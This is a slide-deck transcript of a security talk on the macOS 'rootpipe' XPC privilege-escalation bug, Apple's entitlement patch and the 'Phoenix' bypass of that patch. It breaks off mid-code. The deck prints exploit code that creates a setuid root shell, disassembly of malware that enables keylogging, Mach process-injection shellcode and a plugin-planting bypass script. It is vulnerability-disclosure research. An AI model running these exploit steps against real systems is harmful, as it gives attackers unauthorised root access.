SlideShare a Scribd company logo
@patrickwardle
STICK THAT IN YOUR
(ROOT)PIPE & SMOKE IT
“leverages the best combination of humans and technology to discover
security vulnerabilities in our customers’ web apps, mobile apps, and
infrastructure endpoints”
WHOIS
@patrickwardle	
  	
  
always looking for
more experts!
xpc, rootpipe, malware, patches & 0days :)
OUTLINE
overview of XPC the bug in malware
patch bypasspatch(es)
Credits
hax0ring is rarely an individual effort
Ian Beer Emil Kvarnhammar Pedro Vilaça
uncovered rootpipe
Jonathan Levin
"Mac OS X & iOS Internals"
@emilkvarnhammar @osxreverser
implants
backdoor
remotely accessible means of
providing secret control of device
injection coercing a process to load a module
persistent malicious code
hooking intercepting function calls
trojan
malicious code that masquerades as
legitimate
gotta make sure we’re all on the same page ;)
SOME DEFINITIONS
OVERVIEW OF XPC
modern IPC on OS X
a simple IPC mechanism which can provide security & robustness
XPC
“There are two main reasons to use XPC: privilege
separation and stability.” -apple.com
sandboxed
'XPC services'
[privilege separation]

[stability]
each XPC service has its
own sandbox
crashes in the XPC services
don't affect the app
used all over the place by Apple
XPC IN OS X
$	
  find	
  /System/Library/Frameworks	
  -­‐name	
  *.xpc	
  
AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.FaceTimeService.xpc	
  
AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.MapLauncher.xpc	
  
...	
  
WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.32.xpc	
  
WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc	
  
WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc	
  


$	
  find	
  /Applications	
  -­‐name	
  *.xpc

iPhoto.app/Contents/XPCServices/com.apple.PhotoApps.AVCHDConverter.xpc	
  
iPhoto.app/Contents/XPCServices/com.apple.photostream-­‐agent.VideoConversionService.xpc

Xcode.app/Contents/Developer/Toolchains/.../XPCServices/SourceKitService.xpc	
  
Xcode.app/Contents/XPCServices/com.apple.dt.Xcode.Playground.xpc	
  
...
frameworks and apps that use XPC
frameworks apps
}
moving 'risky' code out-of-proc
XPC
display (uiI)
}
an 'unzip' XPC service
a 'download' XPC service
separate procs.
w/ permissions
'normal' app
XPC'd app
allow
deny
deny
deny
XPC
download, unzip, & display
the app, comms, & xpc service
XPC COMPONENT RESPONSIBILITIES
XPC'd app XPC serviceXPC comms
make connection
send requests (msgs)
listen
authenticate
(optionally)
handle requests"Creating XPC Services"
-apple.com
simply add a new target ('xpc service') in your app's project
ADDING AN XPC SERVICE
creating the XPC service
embedded in apptarget
compile
how to listen for client connections
XPC SERVICE LISTENER
int	
  main(int	
  argc,	
  const	
  char	
  *argv[])	
  {	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //set	
  up	
  NSXPCListener	
  for	
  this	
  service	
  
	
  	
  	
  	
  NSXPCListener	
  *listener	
  =	
  [NSXPCListener	
  serviceListener];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //create/set	
  delegate	
  
	
  	
  	
  	
  listener.delegate	
  =	
  [ServiceDelegate	
  new];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //resuming	
  serviceListener	
  to	
  starts	
  service	
  
	
  	
  	
  	
  [listener	
  resume];	
  
	
  	
  	
  	
  	
  
}	
  
@implementation	
  ServiceDelegate

//where	
  NSXPCListener	
  configures,	
  accepts,	
  &	
  resumes	
  incoming	
  NSXPCConnection	
  
-­‐(BOOL)listener:(NSXPCListener	
  *)listener	
  shouldAcceptNewConnection:(NSXPCConnection*)newConnection	
  {	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //configure	
  the	
  connection,	
  by	
  setting	
  interface	
  that	
  the	
  exported	
  object	
  implements	
  
	
  	
  	
  	
  newConnection.exportedInterface	
  =	
  [NSXPCInterface	
  interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //set	
  the	
  object	
  that	
  the	
  connection	
  exports	
  
	
  	
  	
  	
  newConnection.exportedObject	
  =	
  [imgXPCService	
  new];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //resume	
  connection	
  
	
  	
  	
  	
  [newConnection	
  resume];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //'YES'	
  means	
  connection	
  accepted	
  
	
  	
  	
  	
  return	
  YES;	
  
}
listening & accepting XPC connection(s)
template code in
main.m
@interface	
  imgXPCService	
  :	
  NSObject	
  <imgXPCServiceProtocol>	
  
@end	
  
@implementation	
  imgXPCService	
  
//'remote'	
  XPC	
  method	
  
-­‐(void)downloadImage:(NSURL	
  *)imageURL	
  withReply:(void	
  (^)(NSData	
  *))reply	
  
{	
  
	
  	
  	
  	
  //download	
  image	
  
	
  	
  	
  	
  NSData*	
  imageData	
  =	
  [[NSData	
  alloc]	
  initWithContentsOfURL:imageURL];	
  
	
  	
  	
  	
  	
  
	
  	
  	
  	
  //reply	
  to	
  app	
  
	
  	
  	
  	
  reply(imageData);	
  
}	
  
XPC SERVICE METHOD
XPC'd app XPC service
invoke method
implement the desired logic
//make	
  connection	
  
//	
  -­‐>note:	
  'com.synack.imgXPCService'	
  is	
  name	
  of	
  service	
  
NSXPCConnection*	
  connectionToService	
  =

	
  [[NSXPCConnection	
  alloc]	
  initWithServiceName:@"com.synack.imgXPCService"];	
  
//set	
  interface	
  (protocol)	
  
connectionToService.remoteObjectInterface	
  =	
  
	
  [NSXPCInterface	
  interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];	
  
//resume	
  
[connectionToService	
  resume];	
  
@end
look up by name, set interface, and go!
CONNECTING/USING THE XPC SERVICE
XPC'd app
//invoke	
  remote	
  method	
  
[[connectionToService	
  remoteObjectProxy]	
  downloadImage:@"http://synack.com/logo.png"	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  withReply:^(NSData*	
  imgData)	
  
{	
  
	
  	
  	
  	
  //got	
  downloaded	
  image	
  
	
  	
  	
  	
  NSLog(@"got	
  downloaded	
  image	
  (size:	
  %#lx)",	
  imgData.length);	
  
}];	
  
connect to xpc service
invoke 'remote' method(s)
XPC system will find
service by name
ROOTPIPE
an xpc-based bug
from past to present...
A 'ROOTPIPE' TIMELINE
10/2014 4/2015
discovery by Emil
8/2014
XSLCMD
malware*
OS X 10.10.3
'patched'
4/20152001
OS X 10.0?
phoenix
exploit on 10.10.3
6/2015
OS X 10.10.4
patched
*reported, exploit only uncovered 4/15
the 'writeconfig' xpc service can create files....
THE HEART OF THE VULNERABILITY
//get	
  default	
  file	
  manager	
  
NSFileManager*	
  fileMgr	
  =	
  [NSFileManager	
  defaultManager];

//create	
  file

[fileMgr	
  createFileAtPath:<path>	
  contents:<contents>	
  attributes:<attrs>];
'source' code
async	
  block	
  invoked	
  from	
  within	
  
-­‐[WriteConfigDispatch	
  createFileWithContents:path:attributes:_withAuthorization:]	
  


mov	
  	
  	
  	
  	
  rdx,	
  [rbx+20h]	
  	
  ;	
  file	
  path	
  
mov	
  	
  	
  	
  	
  rcx,	
  [rbx+28h]	
  	
  ;	
  file	
  contents	
  
mov	
  	
  	
  	
  	
  r8,	
  [rbx+30h]	
  	
  	
  ;	
  file	
  attributes	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_createFileAtPath_contents_attributes_	
  ;	
  method	
  
mov	
  	
  	
  	
  	
  rdi,	
  r14	
  	
  	
  	
  	
  	
  	
  	
  ;	
  file	
  manager	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr
disassembly
'writeconfig' XPC service
problem?
anyone can create any file, anywhere as root!
THE HEART OF THE VULNERABILITY
$	
  ps	
  aux	
  |	
  grep	
  	
  writeconfig	
  

	
  root	
  	
  	
  /System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc	
  	
  	
  	
  	
  
'writeconfig' runs as r00t
//create file

[fileMgr createFileAtPath:<path> contents:<contents> attributes:<attrs>];
}
the file path, contents, & permissions are fully controllable - allowing an
unprivileged attacker to create files (as r00t), anywhere on the system!
+ =+
path contents attributes root!
an overview example
EXPLOITATION
writeconfig
XPC service
$	
  ls	
  -­‐lart	
  /myShell	
  
-­‐rwsrwxrwx	
  	
  1	
  root	
  	
  wheel	
  	
  /myShell	
  
$	
  /myShell	
  
#	
  whoami	
  
root
SystemAdministration
framework
{/bin/ksh, 04777, /myShell}
XPC request./r00tpipe
myShell
result: /bin/ksh, setuid'd
(local) object that knows how to talk to the 'writeconfig' XPC service
OBTAIN INSTANCE OF 'WRITECONFIGCLIENT'
___33__WriteConfigClient_sharedClient__block_invoke	
  
...	
  
mov	
  	
  	
  	
  	
  rdi,	
  cs:classRef_WriteConfigClient	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_alloc	
  
mov	
  	
  	
  	
  	
  rbx,	
  cs:_objc_msgSend_ptr	
  
call	
  	
  	
  	
  rbx	
  ;	
  _objc_msgSend	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_init	
  
mov	
  	
  	
  	
  	
  rdi,	
  rax	
  
call	
  	
  	
  	
  rbx	
  ;	
  _objc_msgSend
+[WriteConfigClient sharedClient] disassembly
link w/ SystemAdministration framework
//get	
  class	
  
Class	
  WriteConfigClient	
  =	
  NSClassFromString(@"WriteConfigClient");	
  
	
  

//get	
  instance	
  	
  	
  	
  
id	
  sharedClient	
  =	
  [WriteConfigClient	
  performSelector:@selector(sharedClient)];	
  
	
  	
  	
  	
  
SystemAdministration
framework
allows vulnerability to be triggered
AUTHENTICATE TO THE WRITECONFIG XPC SERVICE
;-­‐[WriteConfigClient	
  authenticateUsingAuthorization:]	
  
...

mov	
  	
  	
  	
  	
  rdi,	
  cs:classRef_NSXPCConnection	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_alloc	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_initWithServiceName	
  
lea	
  	
  	
  	
  	
  rdx,	
  cfstr_Com_apple_sy_1	
  
mov	
  	
  	
  	
  	
  rdi,	
  rax	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr
//authenticate	
  
[sharedClient	
  performSelector:@selector(authenticateUsingAuthorizationSync:)	
  withObject:nil];
;-­‐[WriteConfigClient	
  authenticateUsingAuthorization:]	
  
mov	
  	
  	
  	
  	
  rbx,	
  [r15+r14]	
  
mov	
  	
  	
  	
  	
  rdi,	
  cs:classRef_NSXPCInterface	
  
mov	
  	
  	
  	
  	
  rdx,	
  cs:protocolRef_XPCWriteConfigProtocol	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_interfaceWithProtocol_	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_setRemoteObjectInterface_	
  
mov	
  	
  	
  	
  	
  rdi,	
  rbx	
  
mov	
  	
  	
  	
  	
  rdx,	
  rax	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr	
  
mov	
  	
  	
  	
  	
  rsi,	
  cs:selRef_resume	
  
call	
  	
  	
  	
  cs:_objc_msgSend_ptr
inits connection to 'writeconfig' XPC service
('com.apple.systemadministration.writeconfig') which in turn
triggers invocation of listener: shouldAcceptNewConnection:
allows for (indirect) invocation of remote methods
GET 'DISPATCH' OBJECT
//get	
  remote	
  proxy	
  object	
  
id	
  dispatchObj	
  =	
  [sharedClient	
  performSelector:@selector(remoteProxy)];
#	
  lldb	
  r00tPipe	
  
b	
  -­‐[WriteConfigClient	
  remoteProxy]	
  
Breakpoint	
  1:	
  where	
  =	
  SystemAdministration`-­‐[WriteConfigClient	
  remoteProxy]	
  
thread	
  return	
  
po	
  $rax	
  
<WriteConfigOnewayMessageDispatcher:	
  0x60000000bb10>
WriteConfigOnewayMessageDispatcher
what object type?
dispatch object identification
finally - coerce the remote xpc service to create any file
INVOKE 'REMOTE' METHOD
//invoke	
  remote	
  object	
  
[dispatchObj	
  createFileAtPath:<path>	
  contents:<contents>	
  attributes:<attrs>];
forwardInvocation:
selector +=
'_withAuthorization:'
WriteConfigClient (sharedClient)
remoteObjectProxy
_NSXPCDistantObject
invokeWithTarget:
<NSInvocation:	
  0x60000046e240>	
  
return	
  value:	
  {Vv}	
  void	
  
target:	
  {@}	
  	
  	
  	
  	
  0x60000000c3c0	
  
selector:	
  {:}	
  	
  	
  createFileWithContents:	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  path:attributes:_withAuthorization:	
  
argument	
  2:	
  {@}	
  0x6000000511c0	
  
argument	
  3:	
  {@}	
  0x600000083ed0	
  
argument	
  4:	
  {@}	
  0x6000000743c0	
  
argument	
  5:	
  {@}	
  0x0
WriteConfig
XPC service
attacker's payload
'pls create me a root shell'
COMBINED EXPLOIT
$	
  ./rootPipe	
  	
  
step	
  0x1:	
  got	
  instance	
  <WriteConfigClient:	
  0x7f824141e670>	
  
step	
  0x2:	
  authenticated	
  against	
  XPC	
  service	
  
step	
  0x3:	
  got	
  instance	
  <WriteConfigOnewayMessageDispatcher:	
  0x7f8241433610>	
  
step	
  0x4:	
  invoking	
  remote	
  XPC	
  method	
  to	
  create	
  /myShell	
  with	
  setuid	
  flag	
  
$	
  /myShell	
  	
  
#	
  whoami	
  
root
#	
  fs_usage	
  -­‐f	
  filesystem	
  
<rootPipe>	
  
open	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  F=4	
  	
  	
  	
  (R_____)	
  	
  /bin/ksh	
  
read	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  F=4	
  	
  	
  	
  B=0x154780	
  
<writeconfig>	
  
open	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  F=4	
  	
  	
  	
  (RWC__E)	
  	
  /.dat014a.00b	
  
write	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  F=4	
  	
  	
  	
  B=0x154780	
  
rename	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  /.dat014a.00b	
  
chmod	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  <rwsrwxrwx>	
  	
  	
  	
  	
  	
  /myShell	
  	
  	
  	
  	
  	
  
chown	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  /myShell	
  	
  
exploit & OS's file I/O
rootpipe exploit
only exploitable by admin users
NOTE ON OLDER VERSIONS
//use	
  'Authenticator'	
  class	
  
id	
  authenticator	
  =	
  [Authenticator	
  performSelector:@selector(sharedAuthenticator)];	
  
//authenticate	
  with	
  non-­‐NULL	
  auth	
  object	
  
[authenticator	
  performSelector:@selector(authenticateUsingAuthorizationSync:)	
  withObject:auth];
//use	
  'ToolLiaison'	
  class	
  
id	
  sharedLiaison	
  =	
  [ToolLiaison	
  performSelector:@selector(sharedToolLiaison)];	
  
//get	
  'tool'	
  object	
  
id	
  tool	
  =	
  [sharedLiaison	
  performSelector:@selector(tool)];	
  
//get	
  'tool'	
  object	
  
[tool	
  createFileWithContents:	
  ...]
authentication requires and auth object
file creation via ToolLiaison class
//or	
  directly	
  via	
  via	
  'UserUtilities'	
  	
  
[UserUtilities	
  createFileWithContents:	
  ...];
will fail for non-Admins
file creation via UserUtilities class
}either
CHINA ALREADY KNEW
malware with an 0day!?
"somebody"
provides reverse shell, screen capture & keylogging
OSX/XSLCMD
Forced to Adapt: XSLCmd Backdoor Now on OS X



“a previously unknown variant of the APT backdoor XSLCmd which is
designed to compromise Apple OS X systems” -fireeye.com (9/2014)
reverse shell screen capture keylogging
no mention of any priv-esc exploit(s)
did the malware exploit rootpipe as an 0day!?
OSX/XSLCMD & ROOTPIPE
tweet: 4/2015 why no mention in
FireEye's report!?
OSX/XSLCmd
XSLCmd on VirusTotal
used to turn on access for 'assistive devices' to enable keylogging!
OSX/XSLCMD EXPLOITING ROOTPIPE (OS X 10.7/10.8)
void	
  sub_10000c007()	
  
r12	
  =	
  [Authenticator	
  sharedAuthenticator];	
  
rax	
  =	
  [SFAuthorization	
  authorization];	
  
rbx	
  =	
  rax;	
  
rax	
  =	
  [rax	
  obtainWithRight:"system.preferences"	
  flags:0x3	
  error:0x0];	
  
if	
  (rax	
  !=	
  0x0)	
  {	
  
	
  	
  	
  [r12	
  authenticateUsingAuthorizationSync:rbx];	
  
	
  	
  	
  rax	
  =	
  [r12	
  isAuthenticated];	
  
	
  	
  	
  if	
  (rax	
  !=	
  0x0)	
  {	
  
	
  	
  	
  	
  	
  	
  rbx	
  =	
  [NSDictionary	
  dictionaryWithObject:@(0x124)	
  forKey:*_NSFilePosixPermissions];	
  
	
  	
  	
  	
  	
  	
  rax	
  =	
  [NSData	
  dataWithBytes:"a"	
  length:0x1];	
  
	
  	
  	
  	
  	
  	
  rax	
  =	
  [UserUtilities	
  createFileWithContents:rax	
  path:@"/var/db/.AccessibilityAPIEnabled"	
  attributes:rbx];	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  
download sample: objective-see.com
keylogging
a
.AccessibilityAPIEnabled
=
XSLCmd disassembly
enabling access (via UI)
APPLE'S RESPONSE
#fail (initially)
upgrade or 'die'
FAIL #1: NO PATCH < OS X 10.10
“Apple indicated that this issue required a substantial amount of
changes on their side, and that they will not back port the fix
to 10.9.x and older” -Emil
'patched' OS X Yosemite
(v. 10.10.3)
no (official) patch for
OS X Mavericks & older
=
"How to fix rootpipe in Mavericks" (Luigi)
@osxreverser
TL;DR: (attempt) to only allow authorized clients
APPLE'S ROOTPIPE PATCH
XPC comms
writeconfig
XPC service
access check on clients
unauthorized (non-apple) 'clients' can no longer
connect to the remote writeconfig XPC service
implementation overview
APPLE'S ROOTPIPE PATCH
“The new (patched) version implements a new private entitlement called
com.apple.private.admin.writeconfig. 

If the binary calling the XPC service does not contain this entitlement then 

it can’t connect anymore to the XPC.” @osxreverser
NSXPCListenerDelegate
allow's XPC server
to allow/deny connection
decompilation of listener:shouldAcceptNewConnection
PATCH DETAILS
-­‐[WriteConfigDispatch	
  listener:shouldAcceptNewConnection:]	
  
(NSXPCListener	
  *listener,	
  NSXPCConnection*	
  newConnection)	
  
//get	
  audit	
  token	
  
rbx	
  =	
  SecTaskCreateWithAuditToken(0x0,	
  listener);	
  
//try	
  grab	
  "com.apple.private.admin.writeconfig"	
  entitlement	
  
r13	
  =	
  SecTaskCopyValueForEntitlement(rbx,	
  @"com.apple.private.admin.writeconfig",	
  0x0);	
  
//missing	
  entitlement?	
  
if	
  (r13	
  ==	
  0x0)	
  goto	
  error;	
  
//	
  -­‐>error	
  out,	
  disallowing	
  connection	
  
error:	
  
	
  	
  NSLog(@"###	
  Access	
  denied	
  for	
  unentitled	
  client	
  %@",	
  rbx);
(new) entitlement checks
}
entitlements
confer specific capabilities or security
permissions
embedded in the code signature, as
an entitlement blob
checks for com.apple.private.admin.writeconfig
...the XPC service is still there
FAIL #2: PATCH IS MERELY A ROAD BLOCK
video
PHOENIX; ROOTPIPE REBORN
exploitation on OS X 10.10.3
successfully (re)connect to the protected XPC service
THE GOAL
authentication is 100% dependent on entitlements, can we simply
coerce a legitimate (entitled) binary to execute untrusted code?
}
infection? injection? hijacking? plugins?
connect = win!
entitlements?
can required entitlement be 'faked'?
FAKE ENTITLEMENTS
load-time binary verification
taskgated-­‐helper:	
  validated	
  embedded	
  provisioning	
  profile:	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  entitlements.app/Contents/embedded.provisionprofile	
  
taskgated-­‐helper:	
  unsatisfied	
  entitlement	
  com.apple.private.admin.writeconfig	
  
taskgated-­‐helper:	
  killed	
  com.synack.entitlementsApp	
  because	
  its	
  use	
  of	
  the	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  com.apple.private.admin.writeconfig	
  entitlement	
  is	
  not	
  allowed	
  
manually added entitlement
nope: the OS (taskgated)
validates entitlements
killed by taskgated
scan entire file system for com.apple.private.admin.writeconfig
FIND 'ENTITLED' BINARIES
#recursively	
  walk	
  (starting	
  at	
  r00t)	
  
for	
  root,	
  dirnames,	
  filenames	
  in	
  os.walk('/'):	
  
#check	
  all	
  files	
  
	
  for	
  filename	
  in	
  filenames:	
  


	
  	
  	
  	
  #check	
  for	
  entitlements	
  
	
  	
  	
  	
  output	
  =	
  subprocess.check_output(	
  	
  
	
  	
  	
  	
  ['codesign',	
  '-­‐d',	
  '-­‐-­‐entitlements',	
  '-­‐',	
  os.path.join(root,	
  filename)])	
  
	
  	
  	
  	
  #check	
  for	
  entitlement	
  key	
  
	
  	
  	
  	
  if	
  '<key>com.apple.private.admin.writeconfig</key>'	
  in	
  output:	
  
	
  	
  	
  #found!	
  :)	
  
	
  	
  	
  	
  	
  	
  	
  	
  
#	
  python	
  findEntitled.py	
  
/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder	
  
/System/Library/CoreServices/Setup	
  Assistant.app/Contents/MacOS/Setup	
  Assistant	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  
/System/Library/CoreServices/Applications/Directory	
  Utility.app/Contents/MacOS/Directory	
  Utility	
  
...
entitled binaries
can a entitled binary be infected/patched?
INFECTION
Process:	
  	
  	
  	
  	
  	
  	
  	
  	
  Directory	
  Utility	
  [1337]	
  
Path:	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  Directory	
  Utility.app/Contents/MacOS/Directory	
  Utility	
  
Exception	
  Type:	
  	
  EXC_CRASH	
  (Code	
  Signature	
  Invalid)	
  
Exception	
  Codes:	
  0x0000000000000000,	
  0x0000000000000000
nope: loader verifies all
digital signatures!
killed by the loader
load-time binary verification
can DYLD_INSERT_LIBRARIES be (ab)used?
LOAD-TIME INJECTION
$	
  DYLD_INSERT_LIBRARIES=rootPipe.dylib	
  Directory	
  Utility.app/Contents/MacOS/Directory	
  Utility
//for	
  restricted	
  binaries,	
  delete	
  all	
  DYLD_*	
  and	
  LD_LIBRARY_PATH	
  environment	
  variables	
  
static	
  void	
  pruneEnvironmentVariables(const	
  char*	
  envp[],	
  const	
  char***	
  applep)	
  
{	
  
	
  	
  	
  int	
  removedCount	
  =	
  0;	
  
	
  	
  	
  const	
  char**	
  d	
  =	
  envp;	
  
	
  	
  	
  for(const	
  char**	
  s	
  =	
  envp;	
  *s	
  !=	
  NULL;	
  s++)	
  {	
  
	
   	
  	
  	
  	
  if(strncmp(*s,	
  "DYLD_",	
  5)	
  !=	
  0)	
  	
  
	
   	
   *d++	
  =	
  *s;	
  	
  	
  
	
   	
  	
  	
  	
  else	
  	
  
	
   	
   	
  ++removedCount;	
  	
  	
  
	
   	
  }	
  	
  
	
   	
  	
  
	
  	
  	
  if	
  (removedCount	
  !=	
  0){	
  
	
   	
  	
  	
  	
  	
  dyld::log("dyld:	
  DYLD_	
  environment	
  variables	
  being	
  ignored	
  because	
  ");	
  	
  
	
   	
  	
  	
  	
  	
  switch	
  (sRestrictedReason)	
  {	
  	
  
	
   	
  	
   	
  	
  	
  	
  	
  case	
  restrictedByEntitlements:	
  	
  
	
   	
  	
   	
   	
  	
  	
  	
  	
  	
  	
  dyld::log("main	
  executable	
  (%s)	
  is	
  code	
  signed	
  with	
  entitlementsn",	
  sExecPath);	
  	
  
nope: loader ignores DYLD_
env. vars for entitled binaries
Mach-O loader & DYLD_ environment vars
can dylib hijacking be (ab)used?
DYLIB HIJACKING nope: no vulnerable apps
are entitled
white paper

www.virusbtn.com/dylib
'hijackable' apps
more info
can code be injected into a entitled process?
RUN-TIME INJECTION
//shellcode	
  (here:	
  x86_64)	
  
char	
  shellCode[]	
  =	
  
	
  	
  	
  	
  	
  "x55"	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  //	
  pushq	
  	
  %rbp	
  
	
  	
  	
  	
  	
  "x48x89xe5"	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  //	
  movq	
  	
  	
  %rsp,	
  %rbp	
  
	
  	
  	
  	
  ....

//1:	
  get	
  task	
  for	
  pid	
  
task_for_pid(mach_task_self(),	
  pid,	
  &remoteTask);



//2:	
  alloc	
  remote	
  stack/code

mach_vm_allocate(remoteTask,	
  &remoteStack64,	
  STACK_SIZE,	
  VM_FLAGS_ANYWHERE);

mach_vm_allocate(remoteTask,	
  &remoteCode64,	
  sizeof(shellCode),	
  VM_FLAGS_ANYWHERE);



//3:	
  copy	
  code	
  into	
  remote	
  proc

mach_vm_write(remoteTask,	
  remoteCode64,	
  (vm_address_t)shellCode,	
  sizeof(shellCode));



//4:	
  make	
  remote	
  code	
  executable

vm_protect(remoteTask,	
  remoteCode64,	
  sizeof(shellCode),	
  FALSE,	
  VM_PROT_READ|VM_PROT_EXECUTE);

//5:	
  init	
  &	
  start	
  remote	
  thread

remoteThreadState64.__rip	
  =	
  (u_int64_t)	
  (vm_address_t)	
  remoteCode64;	
  
remoteThreadState64.__rsp	
  =	
  (u_int64_t)	
  remoteStack64;	
  
remoteThreadState64.__rbp	
  =	
  (u_int64_t)	
  remoteStack64;



thread_create_running(remoteTask,	
  x86_THREAD_STATE64,	
  (thread_state_t)&remoteThreadState64,	
  	
  	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  x86_THREAD_STATE64_COUNT,	
  &remoteThread);
nope: task_for_pid()
requires r00t
run-time process injection
can (app-specific) plugins be (ab)used?
EVIL PLUGINS maybe!? Directory Utility
appears to support plugins
#	
  codesign	
  -­‐d	
  -­‐-­‐entitlements	
  -­‐	
  /System/Library/CoreServices/Applications/Directory	
  Utility.app/
Contents/MacOS/Directory	
  Utility	
  	
  
<?xml	
  version="1.0"	
  encoding="UTF-­‐8"?>	
  
<!DOCTYPE	
  plist	
  PUBLIC	
  "-­‐//Apple//DTD	
  PLIST	
  1.0//EN"	
  "http://www.apple.com/DTDs/
PropertyList-­‐1.0.dtd">	
  
<plist	
  version="1.0">	
  
<dict>	
  
	
   <key>com.apple.private.admin.writeconfig</key>	
  
	
   <true/>	
  
</dict>	
  
</plist>
Directory Utility Plugins
can app-specific plugin loading be abused?
EVIL PLUGINS
#	
  fs_usage	
  -­‐w	
  -­‐f	
  filesystem	
  
	
  	
  
open	
  	
  	
  (R_____)	
  	
  /System/Library/CoreServices/Applications/Directory	
  Utility.app/Contents/PlugIns/
NIS.daplug/Contents/MacOS/NIS	
  	
  
open	
  	
  	
  (R_____)	
  	
  /System/Library/CoreServices/Applications/Directory	
  Utility.app/Contents/PlugIns/
LDAPv3.daplug/Contents/MacOS/LDAPv3	
  	
  
open	
  	
  	
  (R_____)	
  	
  /System/Library/CoreServices/Applications/Directory	
  Utility.app/Contents/PlugIns/
Active	
  Directory.daplug/Contents/MacOS/Active	
  Directory	
  
...
void	
  -­‐[PluginController	
  loadPlugins]	
  	
  
{	
  
	
  	
  	
  	
  rax	
  =	
  [NSBundle	
  mainBundle];	
  
	
  	
  	
  	
  rax	
  =	
  [rax	
  builtInPlugInsPath];	
  
	
  	
  	
  	
  [self	
  loadPluginsInDirectory:rax];	
  
	
  return;	
  
}	
  
install an evil plugin?
Directory Utility loading its plugins
simply copy in a plugin to 'install' & get loaded
INSTALL THE PLUGIN (AS ROOT)
plugin installed
auth prompt :(
but...plugin does get loaded!
so close, but still so far? or....
TO RECAP
The entitled 'Directory Utility' app will load (unsigned) plugins,
which then can authenticate with the WriteConfig XPC service!
but don't you need root to install plugin?
owned by root :( ...but we can change
that! #gameover
rootpipe reborn on OS X 10.10.3
PHOENIX, IN 1, 2, 3
copy Directory Utility to /tmp to
gain write permissions
copy plugin (.daplugin) into Directory
Utility's internal plugin directory
execute Directory Utility XPC request
evil plugin
attacker's payload
authenticates
WriteConfig XPC service
Dir. Utility
$	
  ls	
  -­‐lart	
  /private/tmp	
  
drwxr-­‐xr-­‐x	
  	
  patrick	
  	
  wheel	
  Directory	
  Utility.app
#trigger	
  rootpipe	
  on	
  OS	
  X	
  10.10.3	
  
def	
  phoenix():	
  
	
  	
  #copy	
  Directory	
  Utility.app	
  to	
  /tmp	
  
	
  	
  #	
  -­‐>this	
  folder	
  is	
  (obv)	
  accessible	
  to	
  all	
  
	
  	
  shutil.copytree(DIR_UTIL,	
  destination)	
  
	
  	
  #copy	
  evil	
  plugin	
  into	
  app's	
  internal	
  plugin	
  directory	
  
	
  	
  #	
  -­‐>since	
  app	
  is	
  in	
  /tmp,	
  this	
  will	
  now	
  succeed	
  
	
  	
  shutil.copytree('%s'	
  %	
  (ROOTPIPE_PLUGIN),	
  '%s/%s/%s'	
  %	
  (destination,	
  DIR_UTIL_PLUGINS,	
  ROOTPIPE_PLUGIN))	
  
	
  	
  #exec	
  Directory	
  Utility.app	
  
	
  	
  #	
  -­‐>will	
  trigger	
  load	
  of	
  our	
  unsigned	
  bundle	
  (Phoenix.daplug)	
  
	
  	
  #	
  	
  	
  the	
  bundle	
